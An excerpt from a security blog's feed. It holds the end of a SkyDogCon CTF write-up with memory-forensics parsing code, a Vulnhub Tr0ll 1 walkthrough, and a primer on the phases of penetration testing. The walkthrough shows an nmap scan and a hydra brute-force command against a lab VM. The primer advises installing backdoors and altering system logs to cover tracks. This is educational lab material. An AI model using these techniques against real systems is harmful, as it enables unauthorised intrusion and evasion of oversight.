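        c = CMD_RE.match(line)
        if c and pid is not None:
            commands.append({"process": proc, "pid": pid, "index": int(c.group(1)),
                             "addr": int(c.group(2), 16), "cmd": c.group(3)})
    return commands


def hex_to_ascii(hex_words: str) -> str:
    """Decode space-separated hex byte pairs to text (the manual rapidtables step)."""
    return bytes.fromhex("".join(hex_words.split())).decode("ascii", errors="replace")


def decode_hex_echo(cmd: str) -> Optional[Tuple[str, str]]:
    """If the command is `echo <hex> > file`, return (decoded text, target file name)."""
    m = HEX_ECHO_RE.match(cmd.strip())
    return None if m is None else (hex_to_ascii(m.group(1)), m.group(2))


def correlate(filescan_text: str, cmdscan_text: str) -> List[Dict[str, object]]:
    """Join each decoded echo command with the file objects whose name matches its target."""
    records = parse_filescan(filescan_text)
    results = []
    for c in parse_cmdscan(cmdscan_text):
        decoded = decode_hex_echo(str(c["cmd"]))
        if decoded is None:
            continue
        text, target = decoded
        paths = [r["path"] for r in records
                 if str(r["path"]).lower().endswith("\\" + target.lower())]
        results.append({"pid": c["pid"], "target": target, "decoded": text, "paths": paths})
    return results


print(correlate(FILESCAN_SAMPLE, CMDSCAN_SAMPLE))
```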

<p>After I got the last flag and the decoded md5 hash, I googled “Two little mice” and found the quote by Frank Abagnale Sr.</p>

<p><em><a href="https://www.imdb.com/name/nm0000686/?ref_=tt_trv_qu">Frank Abagnale Sr.</a>: Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. The second mouse, wouldn’t quit. He struggled so hard that eventually he churned that cream into butter and crawled out. Gentlemen, as of this moment, I am that second mouse.</em></p>

<p>Frank’s quote gave me goosebumps, and I was really satisfied after I finished this CTF challenge. It was quite challenging and I really had fun!</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[The SkyDogConCTF is one of the most enjoyable CTF challenges that I have ever played because it contained a lot of twists and challenges that don’t need advanced exploitation techniques …]]></summary></entry><entry><title type="html">Vulnhub Tr0ll 1</title><link href="https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1.html" rel="alternate" type="text/html" title="Vulnhub Tr0ll 1" /><published>2017-08-25T00:00:00+00:00</published><updated>2017-08-25T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1.html"><![CDATA[<p>Started with the Nmap Scan</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.40 scan initiated Thu Aug  3 20:58:47 2017 as: nmap -sC -sV -oA nmap 192.168.8.102
Nmap scan report for 192.168.8.102
Host is up (0.0035s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug  3 20:59:07 2017 -- 1 IP address (1 host up) scanned in 19.95 seconds
</code></pre></div></div>
<ul>
  <li>port 21</li>
  <li>port 22</li>
  <li>port 80</li>
</ul>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-07-14-59-21-e1503681890612.png?resize=734%2C585&amp;ssl=1" alt="screenshot-from-2017-08-07-14-59-21-e1503681730435.png" /></p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-02-06-e1503681876965.png?resize=656%2C296&amp;ssl=1" alt="screenshot20from202017-08-072015-02-06.png" /></p>

<p>There is a directory on the web server named secret. So I opened the /secret directory and it showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-03-20-e1503682119899.png?resize=745%2C650&amp;ssl=1" alt="screenshot20from202017-08-072015-03-20.png" /></p>

<p>And yes, it made me mad after seeing this.</p>

<p>Continuing my enumeration, I saw that the FTP server allows anonymous login, so I fired up Filezilla and browsed the FTP server. There is a file there named lol.pcap. A pcap is a file that contains network traffic captured by network analyzers such as Wireshark and some other tools. So to open the pcap file, I launched Wireshark and read it. It showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-032021-37-00-e1503710304210.png?resize=1170%2C610&amp;ssl=1" alt="screenshot20from202017-08-032021-37-00-e1503682196980.png" /></p>

<p>I noticed the “sup3rs3cr3tdirlol” and tried to open it and voila.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-13-36-e1503682263987.png?resize=548%2C388&amp;ssl=1" alt="screenshot20from202017-08-072015-13-36.png" /></p>

<p>I downloaded the file named roflmao, then ran the file command to determine the file type of the downloaded file. It showed that it is an ELF 32-bit LSB executable.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/tr0ll$ file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
</code></pre></div></div>

<p>So the next thing I did was run gdb and then run the executable file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;.
Find the GDB manual and other documentation resources online at:
&lt;http://www.gnu.org/software/gdb/documentation/&gt;.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from roflmao...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/kaipowered/Documents/Vulnhub/tr0ll/roflmao 
Find address 0x0856BF to proceed[Inferior 1 (process 10058) exited with code 040]
(gdb)
</code></pre></div></div>

<p>The output showed me this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Find address 0x0856BF to proceed[Inferior 1 (process 10058) exited with code 040]
</code></pre></div></div>

<p>I tried to find the said address but I wasn’t able to find it in memory, so I tried opening it in the web browser, and it appeared that it was a directory on the web server (luck, I guess).</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-24-34-e1503682433212.png?resize=659%2C390&amp;ssl=1" alt="screenshot20from202017-08-072015-24-34" /></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hydra -L which_one_lol.txt -P Pass.txt 192.168.8.102
</code></pre></div></div>

<p>At first, the username and password combinations did not work, which was frustrating.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hydra -L which_one_lol.txt -p Pass.txt 192.168.8.102
</code></pre></div></div>

<p>But it turned out that the real password was “Pass.txt” itself, so I just changed the option from -P to -p, meaning: with the given password, try the usernames from which_one_lol.txt with hydra to find the correct combination.</p>

<p>After bruteforcing, I was able to get the username and password of the machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>username: overflow
password: Pass.txt
</code></pre></div></div>

<p>Commands Used</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/tr0ll$ ssh overflow@192.168.8.102
overflow@192.168.8.102's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Aug  6 23:35:25 2017 from 192.168.8.2
Could not chdir to home directory /home/overflow: No such file or directory
$
</code></pre></div></div>

<p>https://www.exploit-db.com/exploits/37292/</p>

<p>And after successfully exploiting the tr0ll VM, I was able to read Proof.txt, which can be found in the /root directory.</p>

<p>— FIN —</p>

<p>Solving this challenge was quite frustrating at first because, you know, the tr0ll is trolling you, but most of the time, when I found something interesting and it turned out that I had just been tr0lled, I found myself grinning while clenching my fists. But of course I enjoyed solving this challenge.</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Started with the Nmap Scan # Nmap 7.40 scan initiated Thu Aug 3 20:58:47 2017 as: nmap -sC -sV -oA nmap 192.168.8.102 Nmap scan report for 192.168.8.102 Host is up (0.0035s latency). Not shown: 997…]]></summary></entry><entry><title type="html">Phases of Penetration Testing</title><link href="https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing.html" rel="alternate" type="text/html" title="Phases of Penetration Testing" /><published>2017-08-24T00:00:00+00:00</published><updated>2017-08-24T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing.html"><![CDATA[<p>Penetration Testing, or Pentesting, is a process in which testers assess and discover the vulnerabilities present in a network or system and exploit them to gain access. Pentesting also simulates a real-world scenario in which the testers act and think like an attacker to discover and exploit the weaknesses of the target system.</p>

<p>There are a lot of topics in penetration testing but I will only discuss the phases and techniques that I usually use when I am attacking a vulnerable system.</p>

<p>In general, the phases of penetration testing are</p>

<ol>
  <li>Reconnaissance</li>
  <li>Scanning</li>
  <li>Gaining Access</li>
  <li>Maintaining Access</li>
  <li>Covering Tracks</li>
</ol>

<p>Before attacking our target system, we always need to plan our moves to get a higher chance of gaining access to the system.</p>

<h2 id="reconnaissance">Reconnaissance</h2>

<p>So first is Reconnaissance. Reconnaissance is the phase where we gather the available information about the target with the use of search engines and/or social media sites. There are two types of reconnaissance: passive reconnaissance and active reconnaissance.</p>

<p><strong>Passive reconnaissance</strong> is the gathering of information from Google, company profiles, social media, name servers, etc.</p>

<p><strong>Active reconnaissance</strong> is the gathering of information through scanning the target system with the use of tools that are available and can be downloaded online.</p>

<p>Beware of the IDS/IPS and firewall when scanning, because we will most likely fail if the target system blocks our access.</p>

<p>Tools for <strong>active reconnaissance</strong></p>

<ul>
  <li>nmap</li>
  <li>maltego</li>
  <li>etc.</li>
</ul>

<p>The goal of this phase is to gather the initial information of the target.</p>

<h2 id="scanning">Scanning</h2>

<p>After we have gathered the available information about the target, we scan the target system to discover the vulnerabilities that are present for us to exploit.</p>

<p>Tools for scanning</p>

<ul>
  <li>nmap</li>
  <li>auxiliary modules in metasploit</li>
  <li>etc.</li>
</ul>

<p>Again, beware of the IDS/IPS and Firewall when scanning.</p>

<p>The goal of this phase is to get an idea of how we can exploit the vulnerabilities present on the target system. For example, if the target system is vulnerable to a certain exploit that is publicly available, we can add it to our options for exploiting the target system.</p>

<h2 id="gaining-access">Gaining Access</h2>

<p>After enumerating our target, we now move on to the fun part of hacking: the exploitation phase.</p>

<ul>
  <li>Proper enumeration leads to a better chance of successful exploitation.</li>
  <li>You can use public exploits to attack the vulnerable services that are present on the target machine.</li>
  <li>Public exploits may not work out of the box, so you need to analyze how the exploit works by tracing its source code.</li>
  <li>Modify the source code of the exploit if you need to.</li>
  <li>When compiling public exploits locally, make sure that the kernel version of the local machine matches that of the target machine.</li>
</ul>

<p>The goal of this phase is to properly exploit the vulnerabilities of the target and gain low-level or privileged access to the system.</p>

<h2 id="maintaining-access">Maintaining Access</h2>

<p>When we have successfully exploited the system and obtained low-privileged access, we need to maintain our access long enough to achieve our goal.</p>

<ul>
  <li>If you have gained access to the system, you may install a backdoor in case the user reboots the target machine.</li>
  <li>Since you only have initial access to the system (low-privileged access), enumerate the available programs, weak credentials, default passwords, and anything else that may be used to escalate your privileges.</li>
  <li>Check the versions of the available services that are present on the target machine.</li>
  <li>You can use automated scripts to automate the enumeration process, for example these <strong>Linux Privilege Escalation Enumeration Scripts</strong>:
    <ul>
      <li>unix-privesc-check – <a href="http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</a></li>
      <li>linuxprivchecker.py – <a href="https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123">https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123</a></li>
      <li>linenum – <a href="https://www.rebootuser.com/?p=1758">https://www.rebootuser.com/?p=1758</a></li>
      <li>linux-local-enumeration-script.sh – <a href="https://highon.coffee/blog/linux-local-enumeration-script/">https://highon.coffee/blog/linux-local-enumeration-script/</a></li>
      <li>Basic Linux Priv Escalation (blog post) – <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a></li>
    </ul>
  </li>
</ul>

<p>The goal of this phase is to maintain our access and gain system-level access to the system.</p>

<h2 id="covering-tracks">Covering Tracks</h2>

<p>After we have gained access to the system and we already achieved our goal, we need to delete all the backdoors, exploits, and other files that we used to gain access to the system. We also need to delete or modify the system logs to cover our tracks.</p>

<p>The goal of this phase is self-explanatory.</p>

<h2 id="conclusion">Conclusion</h2>

<p>So there are five phases of penetration testing, and these are Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks. There is still a lot of information that wasn’t included here, but I hope this gave you an idea of the phases and techniques penetration testers use to attack a system.</p>

<p>If you have any questions or suggestions, feel free to contact me. 🙂</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Penetration Testing or Pentesting is a process where the testers will assess and discover the vulnerabilities that are present in a network or system and will exploit these vulnerabilities to gain …]]></summary></entry></feed>